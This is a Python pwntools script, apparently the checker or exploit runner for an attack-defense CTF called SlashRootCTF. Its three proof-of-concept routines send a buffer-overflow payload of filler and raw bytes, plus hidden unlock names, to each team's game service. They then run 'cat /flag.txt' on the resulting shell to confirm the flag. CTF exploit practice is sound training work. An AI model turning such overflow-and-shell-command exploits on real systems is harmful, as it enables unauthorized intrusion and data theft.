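#! /usr/bin/env python2
"""Scripted dialogue checks against the SlashRootCTF game service.

Each ``pocN`` function connects to ``host:port``, plays one fixed menu
dialogue and returns True only when the final reply carries the FORMAT
marker; any other outcome returns False.  The file keeps its Python 2
shebang (the ``in`` checks assume ``str`` replies), but uses ``range`` and
parenthesised ``print`` so it also parses under Python 3.
"""
from pwn import process, remote

HOST = "192.168.2.20"
TOTAL_TEAMS = 1
FORMAT = "SlashRootCTF"  # marker expected inside a valid flag reply

# Every menu turn of the service ends with this prompt character.
PROMPT = ">"


def run():
    """Open the local test instance (kept for interactive use).

    NOTE(review): the commented-out ``process(FILENAME)`` line names a
    variable this file never defines; define FILENAME before re-enabling it.
    """
    # return process(FILENAME)
    return remote("127.0.0.1", 60204)


def _team_port(i):
    """Return the service port of team *i* (60004 + 100 * i)."""
    return 60004 + (i * 100)


def _send_after_prompt(p, line):
    """Wait for the next prompt on tube *p*, then send *line*."""
    p.recvuntil(PROMPT)
    p.sendline(line)


def _read_flag(p):
    """Common tail of every poc: answer the remaining prompts, request the
    flag file and report whether FORMAT is present in the reply.

    Returns True when the marker is found, False otherwise.
    """
    for _ in range(10):
        _send_after_prompt(p, "99")
    p.sendline("cat /flag.txt")
    flag = p.recvuntil("}")
    return FORMAT in flag


def poc0(host, port):
    """Dialogue 0: 32 filler bytes followed by nine raw bytes as the name.

    Returns True only when the service replies with a prompt containing
    "young" and the flag tail contains FORMAT; False otherwise.
    """
    p = remote(host, port)
    try:  # the tube is a live socket; release it on every exit path
        _send_after_prompt(p, ("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
        msg = p.recvuntil(PROMPT)
        if "young" not in msg:
            return False
        p.sendline("y")
        _send_after_prompt(p, "2")
        _send_after_prompt(p, "4")
        _send_after_prompt(p, "y")
        return _read_flag(p)
    finally:
        p.close()


def poc1(host, port):
    """Dialogue 1: name "Leo", then menu choices 3/0 twice, then 1 and 4.

    Returns False as soon as a prompt containing "Who" is seen, otherwise
    whether the flag tail contains FORMAT.
    """
    p = remote(host, port)
    try:
        _send_after_prompt(p, "Leo")
        _send_after_prompt(p, "y")
        for _ in range(2):
            _send_after_prompt(p, "3")
            _send_after_prompt(p, "0")
        # NOTE(review): the original layout was lost; this check is placed
        # after the loop, which is the reading that matches poc0/poc2.
        if "Who" in p.recvuntil(PROMPT):
            return False
        p.sendline("y")
        _send_after_prompt(p, "1")
        _send_after_prompt(p, "4")
        _send_after_prompt(p, "y")
        return _read_flag(p)
    finally:
        p.close()


def poc2(host, port):
    """Dialogue 2: a fixed name string, then menu choice 6.

    Returns True only when the reply shows "Lv: 1000000" and the flag tail
    contains FORMAT; False otherwise.
    """
    p = remote(host, port)
    try:
        _send_after_prompt(p, "__th3_w0rLd_D3str0Y3r_15_b4ck__")
        _send_after_prompt(p, "y")
        _send_after_prompt(p, "6")
        if "Lv: 1000000" not in p.recvuntil(PROMPT):
            return False
        p.sendline("2")
        _send_after_prompt(p, "4")
        _send_after_prompt(p, "y")
        return _read_flag(p)
    finally:
        p.close()


if __name__ == "__main__":
    for i in range(1, TOTAL_TEAMS + 1):
        port = _team_port(i)  # computed once per team instead of three times
        print(poc0(HOST, port))
        print(poc1(HOST, port))
        print(poc2(HOST, port))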